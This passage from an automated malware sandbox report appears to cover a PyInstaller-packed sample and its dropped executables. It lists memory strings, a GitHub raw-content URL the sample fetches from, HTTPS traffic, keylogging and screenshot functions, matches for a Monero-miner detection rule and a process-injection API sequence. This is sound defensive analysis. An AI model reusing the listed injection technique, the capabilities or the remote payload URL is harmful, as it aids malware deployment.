https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: hacn.exe, 00000001.00000002.1665413675.000001E4E5D7C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: main.exe, 00000005.00000002.1756028190.000002441A6B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://system.data.sqlite.org/
Source: hacn.exe, 00000000.00000003.1644672626.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1656605563.000001E4E64DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: hacn.exe, 00000001.00000002.1665862675.000001E4E65E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: main.exe	String found in binary or memory: https://www.sqlite.org/copyright.html
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.sqlite.org/copyright.html2

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49759 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: main.exe.4.dr, utils.cs	.Net Code: desktopScreenshot
Source: Update.exe.5.dr, utils.cs	.Net Code: desktopScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: main.exe.4.dr, utils.cs	.Net Code: KeyboardLayout
Source: Update.exe.5.dr, utils.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Windows\System32\dialer.exe	Code function: 17_2_00007FF65A1310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,	17_2_00007FF65A1310C0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,	22_2_00000225DC6428C8
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW,	26_2_00000202C0AE202C
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF0228C8 NtEnumerateValueKey,NtEnumerateValueKey,	30_2_000002BAAF0228C8
Source: C:\Windows\System32\dialer.exe	Code function: 45_2_00007FF7C6D610C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,	45_2_00007FF7C6D610C0
Source: C:\Windows\System32\dialer.exe	Code function: 49_2_00007FF713F14020 NtOpenKey,	49_2_00007FF713F14020

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Code function: 4_2_000E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

4_2_000E6FAA

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\TEMP\gqxqtdeqxchk.sys

Source: C:\Program Files\Google\Chrome\updater.exe

File deleted: C:\Windows\Temp\wxyubnjmnlae.tmp

Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D341038	0_2_00007FF61D341038
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337F4C	0_2_00007FF61D337F4C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D327960	0_2_00007FF61D327960
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D346470	0_2_00007FF61D346470
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3473BC	0_2_00007FF61D3473BC
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D332E50	0_2_00007FF61D332E50
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D346E70	0_2_00007FF61D346E70
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3466EC	0_2_00007FF61D3466EC
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D331D90	0_2_00007FF61D331D90
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337D98	0_2_00007FF61D337D98
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D33E5B0	0_2_00007FF61D33E5B0
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337F4C	0_2_00007FF61D337F4C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D34A0F8	0_2_00007FF61D34A0F8
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D33E11C	0_2_00007FF61D33E11C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3290D0	0_2_00007FF61D3290D0
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D331F94	0_2_00007FF61D331F94
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D321F50	0_2_00007FF61D321F50
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D34481C	0_2_00007FF61D34481C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D336030	0_2_00007FF61D336030
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3387D0	0_2_00007FF61D3387D0
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3337E0	0_2_00007FF61D3337E0
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D341FE4	0_2_00007FF61D341FE4
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D331980	0_2_00007FF61D331980
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3321A0	0_2_00007FF61D3321A0
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D33A530	0_2_00007FF61D33A530
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D344380	0_2_00007FF61D344380
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D331B84	0_2_00007FF61D331B84
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D341038	0_2_00007FF61D341038
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D3323A4	0_2_00007FF61D3323A4
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D33EC30	0_2_00007FF61D33EC30
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D333BE4	0_2_00007FF61D333BE4
Source: C:\Users\user\Desktop\hacn.exe	Code function: 1_2_00007FFE1A457508	1_2_00007FFE1A457508
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000E848E	4_2_000E848E
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F6CDC	4_2_000F6CDC
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F4088	4_2_000F4088
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F00B7	4_2_000F00B7
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000E40FE	4_2_000E40FE
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F7153	4_2_000F7153
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_001051C9	4_2_001051C9
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F62CA	4_2_000F62CA
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000E32F7	4_2_000E32F7
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F43BF	4_2_000F43BF
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000EC426	4_2_000EC426
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_0010D440	4_2_0010D440
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000EF461	4_2_000EF461
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F77EF	4_2_000F77EF
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000E286B	4_2_000E286B
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_0010D8EE	4_2_0010D8EE
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000EE9B7	4_2_000EE9B7
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_001119F4	4_2_001119F4
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000F3E0B	4_2_000F3E0B
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_00104F9A	4_2_00104F9A
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000EEFE2	4_2_000EEFE2
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CD1820	5_2_00007FFDF7CD1820
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB9840	5_2_00007FFDF7CB9840
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB37C8	5_2_00007FFDF7CB37C8
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D276B0	5_2_00007FFDF7D276B0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DE1660	5_2_00007FFDF7DE1660
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D2B670	5_2_00007FFDF7D2B670
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D0756A	5_2_00007FFDF7D0756A
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D19590	5_2_00007FFDF7D19590
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DD9510	5_2_00007FFDF7DD9510
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D4D4E0	5_2_00007FFDF7D4D4E0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D05480	5_2_00007FFDF7D05480
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D49430	5_2_00007FFDF7D49430
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA7380	5_2_00007FFDF7CA7380
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CCD380	5_2_00007FFDF7CCD380
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CE12F0	5_2_00007FFDF7CE12F0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CAF2E8	5_2_00007FFDF7CAF2E8
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF91B0	5_2_00007FFDF7CF91B0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DDB180	5_2_00007FFDF7DDB180
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D33190	5_2_00007FFDF7D33190
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D61120	5_2_00007FFDF7D61120
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DC5130	5_2_00007FFDF7DC5130
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D83080	5_2_00007FFDF7D83080
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CBA020	5_2_00007FFDF7CBA020
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CBC020	5_2_00007FFDF7CBC020
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D1C020	5_2_00007FFDF7D1C020
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DE7FB0	5_2_00007FFDF7DE7FB0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D8FF20	5_2_00007FFDF7D8FF20
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CEFEF0	5_2_00007FFDF7CEFEF0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D2DF10	5_2_00007FFDF7D2DF10
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF5EE0	5_2_00007FFDF7CF5EE0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CEDF00	5_2_00007FFDF7CEDF00
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D8BCC0	5_2_00007FFDF7D8BCC0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CE3C60	5_2_00007FFDF7CE3C60
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D4DC60	5_2_00007FFDF7D4DC60
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D23C50	5_2_00007FFDF7D23C50
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D47BD0	5_2_00007FFDF7D47BD0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB1BA4	5_2_00007FFDF7CB1BA4
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D05BD0	5_2_00007FFDF7D05BD0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CCFB00	5_2_00007FFDF7CCFB00
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D459E0	5_2_00007FFDF7D459E0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D119F0	5_2_00007FFDF7D119F0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D499D0	5_2_00007FFDF7D499D0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CC19A0	5_2_00007FFDF7CC19A0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA998C	5_2_00007FFDF7CA998C
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA9989	5_2_00007FFDF7CA9989
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CED980	5_2_00007FFDF7CED980
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DF5930	5_2_00007FFDF7DF5930
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA5944	5_2_00007FFDF7CA5944
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D9A780	5_2_00007FFDF7D9A780
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D046D0	5_2_00007FFDF7D046D0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA44F0	5_2_00007FFDF7CA44F0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D16510	5_2_00007FFDF7D16510
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CA84D8	5_2_00007FFDF7CA84D8
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CC6420	5_2_00007FFDF7CC6420
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CC4450	5_2_00007FFDF7CC4450
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CAC440	5_2_00007FFDF7CAC440
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D70390	5_2_00007FFDF7D70390
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D26300	5_2_00007FFDF7D26300
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D0C300	5_2_00007FFDF7D0C300
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF01D0	5_2_00007FFDF7CF01D0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DB8170	5_2_00007FFDF7DB8170
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D50100	5_2_00007FFDF7D50100
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D920F0	5_2_00007FFDF7D920F0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF7010	5_2_00007FFDF7CF7010
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D2AFF0	5_2_00007FFDF7D2AFF0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DE0F90	5_2_00007FFDF7DE0F90
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF4F50	5_2_00007FFDF7CF4F50
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF2EC0	5_2_00007FFDF7CF2EC0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CDEE60	5_2_00007FFDF7CDEE60
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D92E60	5_2_00007FFDF7D92E60
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CACE30	5_2_00007FFDF7CACE30
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DF4E00	5_2_00007FFDF7DF4E00
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB4E10	5_2_00007FFDF7CB4E10
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D60D80	5_2_00007FFDF7D60D80
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CD0D90	5_2_00007FFDF7CD0D90
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CECD40	5_2_00007FFDF7CECD40
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D12D00	5_2_00007FFDF7D12D00
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CD8CF0	5_2_00007FFDF7CD8CF0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D44BA0	5_2_00007FFDF7D44BA0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CEEBD0	5_2_00007FFDF7CEEBD0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D52BB0	5_2_00007FFDF7D52BB0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DE4B90	5_2_00007FFDF7DE4B90
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CFEB20	5_2_00007FFDF7CFEB20
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CF0B50	5_2_00007FFDF7CF0B50
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D06B10	5_2_00007FFDF7D06B10
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D1AA00	5_2_00007FFDF7D1AA00
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7DD69C0	5_2_00007FFDF7DD69C0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CBC9A0	5_2_00007FFDF7CBC9A0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CDE9A0	5_2_00007FFDF7CDE9A0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D849B0	5_2_00007FFDF7D849B0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D32980	5_2_00007FFDF7D32980
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CCA980	5_2_00007FFDF7CCA980
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D12956	5_2_00007FFDF7D12956
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB4940	5_2_00007FFDF7CB4940
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7D8A8E0	5_2_00007FFDF7D8A8E0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CC28A0	5_2_00007FFDF7CC28A0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CD28C0	5_2_00007FFDF7CD28C0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CDA860	5_2_00007FFDF7CDA860
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8CFC38	5_2_00007FFD9B8CFC38
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8CFBC0	5_2_00007FFD9B8CFBC0
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8CBA40	5_2_00007FFD9B8CBA40
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8BF898	5_2_00007FFD9B8BF898
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A6EB8	5_2_00007FFD9B8A6EB8
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A4D11	5_2_00007FFD9B8A4D11
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8C6D58	5_2_00007FFD9B8C6D58
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A7450	5_2_00007FFD9B8A7450
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8D3330	5_2_00007FFD9B8D3330
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A6280	5_2_00007FFD9B8A6280
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A32CB	5_2_00007FFD9B8A32CB
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A71C8	5_2_00007FFD9B8A71C8
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A57FB	5_2_00007FFD9B8A57FB
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8E2570	5_2_00007FFD9B8E2570
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFD9B8A3501	5_2_00007FFD9B8A3501
Source: C:\Windows\System32\dialer.exe	Code function: 17_2_00007FF65A1314D8	17_2_00007FF65A1314D8
Source: C:\Windows\System32\dialer.exe	Code function: 17_2_00007FF65A13226C	17_2_00007FF65A13226C
Source: C:\Windows\System32\dialer.exe	Code function: 17_2_00007FF65A132560	17_2_00007FF65A132560
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC611F2C	22_2_00000225DC611F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC61D0E0	22_2_00000225DC61D0E0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6238A8	22_2_00000225DC6238A8
